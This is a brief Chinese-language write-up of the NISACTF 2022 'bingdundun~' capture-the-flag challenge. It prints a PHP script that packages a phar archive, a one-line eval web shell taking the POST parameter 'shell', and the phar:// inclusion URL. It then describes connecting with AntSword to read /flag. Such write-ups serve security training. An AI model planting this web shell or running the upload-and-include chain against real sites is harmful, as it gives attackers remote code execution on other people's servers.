[NISACTF 2022]bingdundun~
phar 上传然后phar伪协议访问
//pchar.php
<?php
$phar = new Phar('exp.phar'); //
$phar->buildFromDirectory('./exp');//buildFromDirectory指定压缩的目录
$phar->compressFiles(Phar::GZ); //Phar::GZ表示使用gzip来压缩此文件
$phar->stopBuffering();
$phar->setStub($phar->createDefaultStub('exp.php'));//setSub用来设置启动加载的文件
?>
//exp/exp.php
<?php
@eval($_POST['shell']);
?>
最后蚁剑访问 密码shell
?bingdundun=phar://./upload_name/exp
flag就在/flag里